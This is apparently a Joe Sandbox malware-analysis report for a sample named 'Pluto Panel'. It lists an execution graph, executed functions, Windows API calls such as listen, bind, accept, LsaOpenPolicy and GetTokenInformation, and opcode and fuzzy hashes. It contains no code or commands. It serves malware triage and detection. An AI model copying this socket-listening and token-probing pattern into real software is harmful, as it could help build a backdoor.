                                                                                                          execution_graph 44473 3231066 44475 323109b ioctlsocket 44473->44475 44476 32310c7 44475->44476 44477 167a8ae 44478 167a910 44477->44478 44479 167a8da closesocket 44477->44479 44478->44479 44480 167a8e8 44479->44480 44485 167bc2a 44487 167bc62 CreateFileW 44485->44487 44488 167bcb1 44487->44488 44489 3230032 44491 3230067 ReadFile 44489->44491 44492 3230099 44491->44492 44493 167a172 44494 167a1c2 WSAStartup 44493->44494 44495 167a1ca 44494->44495 44499 167a2fa 44500 167a326 FindCloseChangeNotification 44499->44500 44502 167a365 44499->44502 44501 167a334 44500->44501 44502->44500 44503 3230f82 44504 3230fb7 getsockname 44503->44504 44506 3230feb 44504->44506 44507 3231142 44509 323117a accept 44507->44509 44510 32311b5 44509->44510 44511 3230986 44513 32309be CreateMutexW 44511->44513 44514 3230a01 44513->44514 44515 167bd42 44518 167bd77 GetFileType 44515->44518 44517 167bda4 44518->44517 44519 167b002 44521 167b037 GetTokenInformation 44519->44521 44522 167b074 44521->44522 44523 32314c6 44524 3231536 44523->44524 44525 32314fe MapViewOfFile 44523->44525 44524->44525 44526 323150c 44525->44526 44527 3231246 44528 323127b WSAEventSelect 44527->44528 44530 32312b2 44528->44530 44531 323050a 44533 3230542 OpenFileMappingW 44531->44533 44534 323057d 44533->44534 44535 323060a 44536 3230642 MapViewOfFile 44535->44536 44538 3230691 44536->44538 44539 167b84e 44542 167b886 WSASocketW 44539->44542 44541 167b8c2 44542->44541 44543 3230a8e 44544 3230aa2 listen 44543->44544 44546 3230aec 44544->44546 44547 167a5d6 44548 167a614 DuplicateHandle 44547->44548 44549 167a64c 44547->44549 44550 167a622 44548->44550 44549->44548 44551 167ab56 44552 167ab8e RegOpenKeyExW 44551->44552 44554 167abe4 44552->44554 44555 32301d6 44556 3230226 CreateActCtxA 44555->44556 44557 3230234 44556->44557 44558 3230c56 44560 3230c8b GetProcessTimes 44558->44560 44561 3230cbd 44560->44561 44562 167ac5e 44563 167ac93 RegQueryValueExW 44562->44563 44565 167ace7 44563->44565 44566 167b31e 44567 167b356 LsaOpenPolicy 44566->44567 44569 167b397 44567->44569 44570 3230e9e 44571 3230ed3 bind 44570->44571 44573 3230f07 44571->44573 44574 323141e 44575 323146e CreateFileMappingW 44574->44575 44576 3231476 44575->44576 44577 3231a9e 44578 3231aca LoadLibraryShim 44577->44578 44580 3231af8 44578->44580 44581 167a69a 44582 167a6c6 SetErrorMode 44581->44582 44583 167a6ef 44581->44583 44584 167a6db 44582->44584 44583->44582

                                                                                                          Executed Functions

                                                                                                          Function 01672477 Relevance: 4.6, Strings: 3, Instructions: 896COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.704089529.0000000001672000.00000040.00000800.00020000.00000000.sdmp, Offset: 01672000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_1672000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: $qh,$%q82${%q
                                                                                                          • API String ID: 0-1436706911
                                                                                                          • Opcode ID: 39374c691851c4eb0de62d7c9dc22d319df4eea754b4ab7de623dfbde6a4b36b
                                                                                                          • Instruction ID: ee78b49934b6ae03a8e00dd9591d51286abe7f5bbfff35f7cbbd2b197afd80b8
                                                                                                          • Opcode Fuzzy Hash: 39374c691851c4eb0de62d7c9dc22d319df4eea754b4ab7de623dfbde6a4b36b
                                                                                                          • Instruction Fuzzy Hash: DC62DDBB85D7C05FD7138B348C66290BF70AB23224B9D45DFC4D48A4D3E25D994ACBA2
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 03230A50 Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 398 3230a50-3230a5a 399 3230aa2-3230adc 398->399 400 3230a5c 398->400 406 3230b1e-3230b23 399->406 407 3230ade-3230ae6 listen 399->407 401 3230a76-3230aa0 400->401 402 3230a5e-3230a75 400->402 401->399 402->401 406->407 408 3230aec-3230afe 407->408 410 3230b00-3230b1d 408->410 411 3230b25-3230b2a 408->411 411->410
                                                                                                          APIs
                                                                                                          • listen.WS2_32(?,00000E2C,70573F6A,00000000,00000000,00000000,00000000), ref: 03230AE4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.705579286.0000000003230000.00000040.00000800.00020000.00000000.sdmp, Offset: 03230000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_3230000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: listen
                                                                                                          • String ID:
                                                                                                          • API String ID: 3257165821-0
                                                                                                          • Opcode ID: 5277160ae89310da5945408f0b047a85bb863c4ea1a9ab5a7d623def6924073c
                                                                                                          • Instruction ID: 70dfabf8dddb7809599705b586501f36979d7802ec44356873007de765b87c16
                                                                                                          • Opcode Fuzzy Hash: 5277160ae89310da5945408f0b047a85bb863c4ea1a9ab5a7d623def6924073c
                                                                                                          • Instruction Fuzzy Hash: E921F6B14097846FE712CB54DC41B56BFACEF02324F0980DAED449F193D2785909CB71
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 03230E6B Relevance: 1.6, APIs: 1, Instructions: 81networkCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • bind.WS2_32(?,00000E2C,70573F6A,00000000,00000000,00000000,00000000), ref: 03230EFF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.705579286.0000000003230000.00000040.00000800.00020000.00000000.sdmp, Offset: 03230000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_3230000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: bind
                                                                                                          • String ID:
                                                                                                          • API String ID: 1187836755-0
                                                                                                          • Opcode ID: edcbeb84eff240d080d82be5f349c41d1a5e1b20bc0bd63b16a1854520f3b1d6
                                                                                                          • Instruction ID: 35559431c19d67ab0ad7a445d04b31fd12ed3b64e0b10d24beedfe22e883bad2
                                                                                                          • Opcode Fuzzy Hash: edcbeb84eff240d080d82be5f349c41d1a5e1b20bc0bd63b16a1854520f3b1d6
                                                                                                          • Instruction Fuzzy Hash: C12171B55093846FE712CF61DC84B96BFB8EF06220F0884EBED85DF152D268A549CB71
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 03230E9E Relevance: 1.6, APIs: 1, Instructions: 62networkCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • bind.WS2_32(?,00000E2C,70573F6A,00000000,00000000,00000000,00000000), ref: 03230EFF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.705579286.0000000003230000.00000040.00000800.00020000.00000000.sdmp, Offset: 03230000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_3230000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: bind
                                                                                                          • String ID:
                                                                                                          • API String ID: 1187836755-0
                                                                                                          • Opcode ID: 9530d8af3a82211d4b64243f9fdfeab6f7d87cf3d07c859eabebd67b41299385
                                                                                                          • Instruction ID: 78c88240c8f487564947ccbe81ac9dffaff6de367044e38da5838124cb37e2ff
                                                                                                          • Opcode Fuzzy Hash: 9530d8af3a82211d4b64243f9fdfeab6f7d87cf3d07c859eabebd67b41299385
                                                                                                          • Instruction Fuzzy Hash: 0C1190B1504205AFE710CF55DC84B9AFBACEF05620F08C4AAED459B251D678E548CAB1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 03230A8E Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • listen.WS2_32(?,00000E2C,70573F6A,00000000,00000000,00000000,00000000), ref: 03230AE4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.705579286.0000000003230000.00000040.00000800.00020000.00000000.sdmp, Offset: 03230000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_3230000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: listen
                                                                                                          • String ID:
                                                                                                          • API String ID: 3257165821-0
                                                                                                          • Opcode ID: e06aea5f747b1a337e806e37a18ba287783ef2c2e882b00dff0f226d52c4c61a
                                                                                                          • Instruction ID: 6a5c785448c08d0a6d9c681b2c735ad5fedb6cac285d5f6bf1ea9cd613131027
                                                                                                          • Opcode Fuzzy Hash: e06aea5f747b1a337e806e37a18ba287783ef2c2e882b00dff0f226d52c4c61a
                                                                                                          • Instruction Fuzzy Hash: DF1125B1504205AFEB10CF60DC84F6AFBACEF04224F08C4AAED05AF251D278A548CFB1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 03200898 Relevance: 2.7, Strings: 2, Instructions: 204COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 184 3200898-32008c9 185 32008d0-32008fe 184->185 186 32008cb 184->186 187 3200900-3200911 185->187 188 320091b 185->188 186->185 187->188 194 3200913-3200919 187->194 189 3200922-320092e 188->189 190 3200cb2-3200cc6 189->190 191 3200934-320094e 189->191 196 3200954-3200978 191->196 197 3200a1f-3200a42 191->197 194->189 200 320097a-320097d 196->200 201 320097f-3200982 196->201 206 3200a49-3200a6b 197->206 202 3200985-32009af 200->202 201->202 209 32009b1-3200a10 202->209 210 3200a1b-3200a1d 202->210 211 3200a72-3200a75 206->211 212 3200a6d-3200a70 206->212 209->210 210->206 213 3200a78-3200aa7 211->213 212->213 219 3200aa9-3200abd 213->219 220 3200abf 213->220 222 3200ac2 219->222 220->222 225 3200ac9-3200c7c 222->225 228 3200c83-3200c86 225->228 229 3200c7e-3200c81 225->229 230 3200c89-3200ca7 228->230 229->230 230->190
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.705481925.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_3200000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: :@!q$`5Hq
                                                                                                          • API String ID: 0-4015697240
                                                                                                          • Opcode ID: 810f8b5c3d981fe4be15f8fefd5970de834ff619e04f8a72243a5c918470665c
                                                                                                          • Instruction ID: 0795279b8d13966ac0f2bc77e5384994299a37b78b0bc011a67d58d6cf68ef34
                                                                                                          • Opcode Fuzzy Hash: 810f8b5c3d981fe4be15f8fefd5970de834ff619e04f8a72243a5c918470665c
                                                                                                          • Instruction Fuzzy Hash: 4A910470E11219CFEB14DFA9C894BADBBF2BF48300F148169D509AB3A1DB719989CF10
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 0167B729 Relevance: 1.6, APIs: 1, Instructions: 115registryCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 234 167b729-167b731 235 167b733 234->235 236 167b779-167b77c 234->236 237 167b735-167b74c 235->237 238 167b74d-167b75b 235->238 239 167b77d-167b7af 236->239 237->238 238->239 242 167b75d-167b778 238->242 245 167b7b2-167b80a RegQueryValueExW 239->245 242->236 247 167b810-167b826 245->247
                                                                                                          APIs
                                                                                                          • RegQueryValueExW.KERNELBASE(?,00000E2C,?,?), ref: 0167B802
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.704122862.000000000167A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167A000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_167a000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: QueryValue
                                                                                                          • String ID:
                                                                                                          • API String ID: 3660427363-0
                                                                                                          • Opcode ID: 971c032c183749619ac41e83378b018a1dbd52509bd5b9b0c01cd2fadb48a58d
                                                                                                          • Instruction ID: f6e58352288d9ad56344c357b7c1ff5a5bf401b03f5cb71f5ddbf0ec3c4f6b7b
                                                                                                          • Opcode Fuzzy Hash: 971c032c183749619ac41e83378b018a1dbd52509bd5b9b0c01cd2fadb48a58d
                                                                                                          • Instruction Fuzzy Hash: AA41292500E7C0AFD3138B358C65A61BFB4EF47620F0E85DBD9849F5A3D2686909D7B2
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 0167BBF3 Relevance: 1.6, APIs: 1, Instructions: 98fileCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 248 167bbf3-167bc82 252 167bc87-167bc93 248->252 253 167bc84 248->253 254 167bc95 252->254 255 167bc98-167bca1 252->255 253->252 254->255 256 167bca3-167bcc7 CreateFileW 255->256 257 167bcf2-167bcf7 255->257 260 167bcf9-167bcfe 256->260 261 167bcc9-167bcef 256->261 257->256 260->261
                                                                                                          APIs
                                                                                                          • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0167BCA9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.704122862.000000000167A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167A000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_167a000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateFile
                                                                                                          • String ID:
                                                                                                          • API String ID: 823142352-0
                                                                                                          • Opcode ID: 72dd268cfd0ea41a83e2714fb5f64c14260bd616be093f00265ef1b3ec4f11c8
                                                                                                          • Instruction ID: 1338ddd602218bba0edbc65417afafb9c08dc11e07ab56019fe06f3e864cc316
                                                                                                          • Opcode Fuzzy Hash: 72dd268cfd0ea41a83e2714fb5f64c14260bd616be093f00265ef1b3ec4f11c8
                                                                                                          • Instruction Fuzzy Hash: AC319EB2505380AFE722CF25DD45B62BFF8EF06214F08849AE9849F252D375E509CB71
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 0167AB26 Relevance: 1.6, APIs: 1, Instructions: 92registryCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 264 167ab26-167abb1 268 167abb6-167abcd 264->268 269 167abb3 264->269 271 167ac0f-167ac14 268->271 272 167abcf-167abe2 RegOpenKeyExW 268->272 269->268 271->272 273 167ac16-167ac1b 272->273 274 167abe4-167ac0c 272->274 273->274
                                                                                                          APIs
                                                                                                          • RegOpenKeyExW.KERNELBASE(?,00000E2C), ref: 0167ABD5
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.704122862.000000000167A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167A000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_167a000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Open
                                                                                                          • String ID:
                                                                                                          • API String ID: 71445658-0
                                                                                                          • Opcode ID: aed1c6cb927a1dab1da8c5b8942cbbed58b8335d91b4211257d4c1b4e37d4c0a
                                                                                                          • Instruction ID: 59be042eafe7d9031119f5a712ab15b62e81d5d3cfc16b1b4af3c0d81345e263
                                                                                                          • Opcode Fuzzy Hash: aed1c6cb927a1dab1da8c5b8942cbbed58b8335d91b4211257d4c1b4e37d4c0a
                                                                                                          • Instruction Fuzzy Hash: BA31C8B25043846FE7228F65DC45FA7BFBCEF05610F08859AED809B152D264E549CB71
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 03231109 Relevance: 1.6, APIs: 1, Instructions: 90networkCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 279 3231109-3231194 283 3231196 279->283 284 3231199-32311a5 279->284 283->284 285 32311a7-32311af accept 284->285 286 32311f6-32311fb 284->286 287 32311b5-32311cb 285->287 286->285 289 32311fd-3231202 287->289 290 32311cd-32311f3 287->290 289->290
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.705579286.0000000003230000.00000040.00000800.00020000.00000000.sdmp, Offset: 03230000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_3230000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: accept
                                                                                                          • String ID:
                                                                                                          • API String ID: 3005279540-0
                                                                                                          • Opcode ID: d5836c71ce9481bf349023666612f9e2d29159670bcb992254aa6fd8051cbc6c
                                                                                                          • Instruction ID: b5853b3b28505774c6f73f932a7b5c10f49e3adc03268b5cb32d940a52ac9992
                                                                                                          • Opcode Fuzzy Hash: d5836c71ce9481bf349023666612f9e2d29159670bcb992254aa6fd8051cbc6c
                                                                                                          • Instruction Fuzzy Hash: 6631AFB1509780AFE712CB25DC45B96FFB8EF06210F0884DAED849F253D365A908CB62
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 03230C18 Relevance: 1.6, APIs: 1, Instructions: 89timeCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 310 3230c18-3230cad 315 3230cfa-3230cff 310->315 316 3230caf-3230cb7 GetProcessTimes 310->316 315->316 318 3230cbd-3230ccf 316->318 319 3230d01-3230d06 318->319 320 3230cd1-3230cf7 318->320 319->320
                                                                                                          APIs
                                                                                                          • GetProcessTimes.KERNELBASE(?,00000E2C,70573F6A,00000000,00000000,00000000,00000000), ref: 03230CB5
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.705579286.0000000003230000.00000040.00000800.00020000.00000000.sdmp, Offset: 03230000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_3230000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ProcessTimes
                                                                                                          • String ID:
                                                                                                          • API String ID: 1995159646-0
                                                                                                          • Opcode ID: bfc6a2a1940810da80b28b7f5b88162c7670dfc19fc08ef9b277e6f2f0736ee4
                                                                                                          • Instruction ID: d4406bcf02c66a2b084ea31566daf3804873522967f13ec722ba9a22ed5fc669
                                                                                                          • Opcode Fuzzy Hash: bfc6a2a1940810da80b28b7f5b88162c7670dfc19fc08ef9b277e6f2f0736ee4
                                                                                                          • Instruction Fuzzy Hash: A331F7B25093806FE7128F60DC45F96BFB8EF06310F0884DAED859F153D264A549CB71
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 0167AC1D Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 293 167ac1d-167ac9b 296 167aca0-167aca9 293->296 297 167ac9d 293->297 298 167acae-167acb4 296->298 299 167acab 296->299 297->296 300 167acb6 298->300 301 167acb9-167acd0 298->301 299->298 300->301 303 167ad07-167ad0c 301->303 304 167acd2-167ace5 RegQueryValueExW 301->304 303->304 305 167ace7-167ad04 304->305 306 167ad0e-167ad13 304->306 306->305
                                                                                                          APIs
                                                                                                          • RegQueryValueExW.KERNELBASE(?,00000E2C,70573F6A,00000000,00000000,00000000,00000000), ref: 0167ACD8
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.704122862.000000000167A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167A000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_167a000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: QueryValue
                                                                                                          • String ID:
                                                                                                          • API String ID: 3660427363-0
                                                                                                          • Opcode ID: 93551999c63014a851db976bda5e75e402ae2c2bf9030718b4e07c94da3b1184
                                                                                                          • Instruction ID: 64350024a9f3baddc87c58c5987dba2f1cebc693e2cc04b8c4b66b9aedc8fa0a
                                                                                                          • Opcode Fuzzy Hash: 93551999c63014a851db976bda5e75e402ae2c2bf9030718b4e07c94da3b1184
                                                                                                          • Instruction Fuzzy Hash: CF31A475109384AFE722CF65CC44FA6BFB8EF06210F08849AE985DB253D364E549CB71
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 032305CC Relevance: 1.6, APIs: 1, Instructions: 87fileCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 323 32305cc-3230676 328 32306ba-32306bf 323->328 329 3230678-323068f MapViewOfFile 323->329 328->329 330 32306c1-32306c6 329->330 331 3230691-32306b7 329->331 330->331
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.705579286.0000000003230000.00000040.00000800.00020000.00000000.sdmp, Offset: 03230000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_3230000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileView
                                                                                                          • String ID:
                                                                                                          • API String ID: 3314676101-0
                                                                                                          • Opcode ID: b2783a33003aebc131e0d0840756ea38778c73ab2f8cd2d67771fe5c0117e090
                                                                                                          • Instruction ID: b010de26b05571882946bb4ce8f5cb2f0f7a077623a13db16e0a92363cbf8b29
                                                                                                          • Opcode Fuzzy Hash: b2783a33003aebc131e0d0840756ea38778c73ab2f8cd2d67771fe5c0117e090
                                                                                                          • Instruction Fuzzy Hash: DD31C2B2405780AFE722CF55DC85F56FFF8EF06320F08859AE9849B262D364A549CB71
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 03231204 Relevance: 1.6, APIs: 1, Instructions: 87networkCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 335 3231204-32312a2 341 32312e6-32312eb 335->341 342 32312a4-32312ac WSAEventSelect 335->342 341->342 343 32312b2-32312c4 342->343 345 32312c6-32312e3 343->345 346 32312ed-32312f2 343->346 346->345
                                                                                                          APIs
                                                                                                          • WSAEventSelect.WS2_32(?,00000E2C,70573F6A,00000000,00000000,00000000,00000000), ref: 032312AA
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.705579286.0000000003230000.00000040.00000800.00020000.00000000.sdmp, Offset: 03230000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_3230000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: EventSelect
                                                                                                          • String ID:
                                                                                                          • API String ID: 31538577-0
                                                                                                          • Opcode ID: e9306b8ce23ce73f19b77ef0c5166ec659998625612d5954d99f2d60c66b99aa
                                                                                                          • Instruction ID: 47e9fffa3b50f64232e6fab3e7e580494d6bd5f6c52aaf30645e4fe0ec9effe1
                                                                                                          • Opcode Fuzzy Hash: e9306b8ce23ce73f19b77ef0c5166ec659998625612d5954d99f2d60c66b99aa
                                                                                                          • Instruction Fuzzy Hash: 463180B24093846FE712CB61DC85F96BFB8EF06220F1984DBE984DF153D228A549CB71
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 0167AFCF Relevance: 1.6, APIs: 1, Instructions: 86COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 349 167afcf-167b064 354 167b066-167b06e GetTokenInformation 349->354 355 167b0b1-167b0b6 349->355 356 167b074-167b086 354->356 355->354 358 167b0b8-167b0bd 356->358 359 167b088-167b0ae 356->359 358->359
                                                                                                          APIs
                                                                                                          • GetTokenInformation.KERNELBASE(?,00000E2C,70573F6A,00000000,00000000,00000000,00000000), ref: 0167B06C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.704122862.000000000167A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167A000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_167a000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InformationToken
                                                                                                          • String ID:
                                                                                                          • API String ID: 4114910276-0
                                                                                                          • Opcode ID: 50ee40c9f4d508ae2baaca498a3d6663e68af02d141077790a653f5631ed9cf1
                                                                                                          • Instruction ID: da5671ed203d27786424000c4a692c5a006e4e431d4f434a33271c71e4c3d091
                                                                                                          • Opcode Fuzzy Hash: 50ee40c9f4d508ae2baaca498a3d6663e68af02d141077790a653f5631ed9cf1
                                                                                                          • Instruction Fuzzy Hash: 49318171509384AFE7128B65DC45F97BFB8EF06210F0884AFED85DB163D268A508CB72
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 03230959 Relevance: 1.6, APIs: 1, Instructions: 85synchronizationCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 377 3230959-32309d5 381 32309d7 377->381 382 32309da-32309e3 377->382 381->382 383 32309e5 382->383 384 32309e8-32309f1 382->384 383->384 385 32309f3-3230a17 CreateMutexW 384->385 386 3230a42-3230a47 384->386 389 3230a49-3230a4e 385->389 390 3230a19-3230a3f 385->390 386->385 389->390
                                                                                                          APIs
                                                                                                          • CreateMutexW.KERNELBASE(?,?), ref: 032309F9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.705579286.0000000003230000.00000040.00000800.00020000.00000000.sdmp, Offset: 03230000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_3230000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateMutex
                                                                                                          • String ID:
                                                                                                          • API String ID: 1964310414-0
                                                                                                          • Opcode ID: 2595f07db90cc8fff1e2ad9b604174dbb6873cb360557444effd780a1eb5a456
                                                                                                          • Instruction ID: 0442ea19c6e5203946d9b0448d0f37fc36a3e3d47dda9982b71e0333f5d47aa9
                                                                                                          • Opcode Fuzzy Hash: 2595f07db90cc8fff1e2ad9b604174dbb6873cb360557444effd780a1eb5a456
                                                                                                          • Instruction Fuzzy Hash: BA3180B1509780AFE711CF65DC45B56FFF8EF06210F0884AAED859B292D364E948CB71
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 0167B2F3 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 362 167b2f3-167b379 366 167b37e-167b387 362->366 367 167b37b 362->367 368 167b3d6-167b3db 366->368 369 167b389-167b391 LsaOpenPolicy 366->369 367->366 368->369 371 167b397-167b3a9 369->371 372 167b3dd-167b3e2 371->372 373 167b3ab-167b3d3 371->373 372->373
                                                                                                          APIs
                                                                                                          • LsaOpenPolicy.ADVAPI32(?,00000E2C), ref: 0167B38F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.704122862.000000000167A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167A000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_167a000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: OpenPolicy
                                                                                                          • String ID:
                                                                                                          • API String ID: 2030686058-0
                                                                                                          • Opcode ID: 0a1335a4a1a5559aa28742bca5df1f2d6076186caec33c76aaeac100cad6b689
                                                                                                          • Instruction ID: 934dfb19ee9a77d5e436612c1a72066946b4675631b104daf6ccbe0a238f5a43
                                                                                                          • Opcode Fuzzy Hash: 0a1335a4a1a5559aa28742bca5df1f2d6076186caec33c76aaeac100cad6b689
                                                                                                          • Instruction Fuzzy Hash: A5219172505284AFE721CF65DC85F6ABFB8EF05220F18889AED849B252D364A548CB61
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 0167A120 Relevance: 1.6, APIs: 1, Instructions: 83networkCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 393 167a120-167a16f 394 167a172-167a1c4 WSAStartup 393->394 396 167a1ca-167a1f3 394->396
                                                                                                          APIs
                                                                                                          • WSAStartup.WS2_32(?,00000E2C,?,?), ref: 0167A1C2
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.704122862.000000000167A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167A000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_167a000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Startup
